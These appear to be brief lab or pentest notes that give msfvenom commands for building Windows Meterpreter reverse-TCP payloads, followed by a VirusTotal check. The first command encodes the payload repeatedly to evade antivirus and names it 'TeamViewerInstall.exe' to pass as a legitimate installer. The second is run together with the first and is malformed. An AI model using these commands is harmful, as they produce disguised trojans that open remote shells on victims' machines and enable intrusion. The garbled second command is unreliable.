creting a payload with msfvenom
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exemsfvenom windows/x86/meterpreter_reverse_tcp LHOST=192.168.246.133 LPORT=7272 -k -e x86/shikata_ga_nai -a x86 --platform windows -o ~/test.js -i 10
checking with virustotal
msf-virustotal -k <API key> -f TeamViewerInstall.exe